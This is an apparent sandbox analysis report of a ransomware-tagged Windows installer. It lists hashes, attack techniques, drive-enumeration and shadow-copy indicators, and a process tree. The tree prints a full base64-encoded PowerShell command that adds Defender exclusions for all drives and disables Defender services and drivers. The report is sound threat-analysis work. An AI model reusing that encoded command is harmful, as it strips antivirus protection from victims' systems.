cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b

Analysis

max time kernel
1s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
12-02-2024 04:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Size

4.8MB
MD5

9803950281290044e32fb78605c129b5
SHA1

133f587df70680d81c18d8c112b9a34e6041d629
SHA256

cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b
SHA512

b5be7c8710a6dfea3fafc85cd10881c62be587607be8f05a61f9bf6aa88456c8c1dd694c85dd5707cd5518bb2f87f077824e410c24f081fab30ea13572de3c21
SSDEEP

98304:pWFsTuRN2zazBLlLvOc1Pgd1E20fzsFvOF3BQQi4y0g1ea6:pWFsTuRN2zahf1Y7EhZSlI

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\K:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\S:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\T:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\W:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\Z:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\I:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\L:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\P:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\U:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\X:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\B:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\J:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\R:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\Y:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e574b51.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e574b51.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Loads dropped DLL 4 IoCs

pid	Process
4512	MsiExec.exe
4512	MsiExec.exe
4512	MsiExec.exe
4512	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5876	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4896	vssadmin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1868	msiexec.exe
Token: SeCreateTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncreaseQuotaPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeMachineAccountPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTcbPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSecurityPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTakeOwnershipPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLoadDriverPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemProfilePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemtimePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeProfSingleProcessPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncBasePriorityPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePagefilePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePermanentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeBackupPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRestorePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeShutdownPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeDebugPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAuditPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemEnvironmentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeChangeNotifyPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRemoteShutdownPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeUndockPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSyncAgentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeEnableDelegationPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeManageVolumePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeImpersonatePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateGlobalPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncreaseQuotaPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeMachineAccountPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTcbPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSecurityPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTakeOwnershipPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLoadDriverPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemProfilePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemtimePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeProfSingleProcessPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncBasePriorityPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePagefilePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePermanentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeBackupPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRestorePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeShutdownPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeDebugPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAuditPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemEnvironmentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeChangeNotifyPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRemoteShutdownPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeUndockPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSyncAgentPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeEnableDelegationPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeManageVolumePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeImpersonatePrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateGlobalPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncreaseQuotaPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeMachineAccountPrivilege	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1868 wrote to memory of 4512	1868	msiexec.exe	88
PID 1868 wrote to memory of 4512	1868	msiexec.exe	88
PID 1868 wrote to memory of 4512	1868	msiexec.exe	88
PID 2216 wrote to memory of 4604	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	89
PID 2216 wrote to memory of 4604	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	89
PID 2216 wrote to memory of 4604	2216	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	89

C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
"C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2024.02.07\990F4DC\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707481120 " AI_EUIMSI=""
  2⤵
  PID:4604

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B5FBFB3C3EDC8B8F61A25D29DAC5C89A C
  2⤵
  - Loads dropped DLL
  PID:4512
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D9151CF6A366954F41CF4EE4E699A4BC
  2⤵
  PID:464
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4E13.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4E10.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4E11.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4E12.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:4772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAKAAtAE4AbwB0ACAAJAAoACQAKAB3AGgAbwBhAG0AaQApACAALQBlAHEAIAAiAG4AdAAgAGEAdQB0AGgAbwByAGkAdAB5AFwAcwB5AHMAdABlAG0AIgApACkAIAB7AAoAIAAgACAAIAAkAEkAcwBTAHkAcwB0AGUAbQAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAIAAgACAAIABpAGYAIAAoAC0ATgBvAHQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AIABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcAKQApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAGAAIgAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBNAHkAQwBvAG0AbQBhAG4AZAAuAFAAYQB0AGgAIAArACAAIgBgACIAIAAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBVAG4AYgBvAHUAbgBkAEEAcgBnAHUAbQBlAG4AdABzAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVgBlAHIAYgAgAFIAdQBuAGEAcwAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABFAHgAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACQAcABzAGUAeABlAGMAXwBwAGEAdABoACAAPQAgACQAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABQAHMARQB4AGUAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAJwBpAGcAbgBvAHIAZQAnACkALgBTAG8AdQByAGMAZQAgAAoAIAAgACAAIABpAGYAKAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiACAALQBpACAALQBzACAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMAIAAKACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABDAG8AbQBtAGEAbgBkAEwAaQBuAGUACgAgACAAIAAgACAAIAAgACAAZQB4AGkAdAAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoACgB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAdAByAHUAZQAKAH0ACgAKADYANwAuAC4AOQAwAHwAZgBvAHIAZQBhAGMAaAAtAG8AYgBqAGUAYwB0AHsACgAgACAAIAAgACQAZAByAGkAdgBlACAAPQAgAFsAYwBoAGEAcgBdACQAXwAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAiACQAKAAkAGQAcgBpAHYAZQApADoAXAAqACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgB9AAoACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoACgAkAHMAdgBjAF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQATgBpAHMAUwB2AGMAIgAsACAAIgBXAGkAbgBEAGUAZgBlAG4AZAAiACwAIAAiAFMAZQBuAHMAZQAiACkACgBmAG8AcgBlAGEAYwBoACgAJABzAHYAYwAgAGkAbgAgACQAcwB2AGMAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABzAHYAYwAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAHMAdgBjACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAcwB2AGMAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAfQAKAH0ACgAKACQAZAByAHYAXwBsAGkAcwB0ACAAPQAgAEAAKAAiAFcAZABuAGkAcwBEAHIAdgAiACwAIAAiAHcAZABmAGkAbAB0AGUAcgAiACwAIAAiAHcAZABiAG8AbwB0ACIAKQAKAGYAbwByAGUAYQBjAGgAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAdgBfAGwAaQBzAHQAKQAgAHsACgAgACAAIAAgAGkAZgAoACQAKABUAGUAcwB0AC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAGQAcgB2ACIAKQApACAAewAKACAAIAAgACAAIAAgACAAIABpAGYAKAAgACQAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAZAByAHYAIgApAC4AUwB0AGEAcgB0ACAALQBlAHEAIAA0ACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABkAHIAdgAiACAALQBOAGEAbQBlACAAUwB0AGEAcgB0ACAALQBWAGEAbAB1AGUAIAA0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGUAZQBkAF8AcgBlAGIAbwBvAHQAIAA9ACAAJABmAGEAbABzAGUACgAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoAfQAKAAoAaQBmACgAJAAoAEcARQBUAC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgAFcAaQBuAEQAZQBmAGUAbgBkACkALgBTAHQAYQB0AHUAcwAgAC0AZQBxACAAIgBSAHUAbgBuAGkAbgBnACIAKQAgAHsAIAAgACAACgAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAfQA=
      4⤵
      PID:368
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1892
    - - C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe"
        5⤵
        
        PID:2900
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5BE3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5BE0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5BE1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr5BE2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:1892
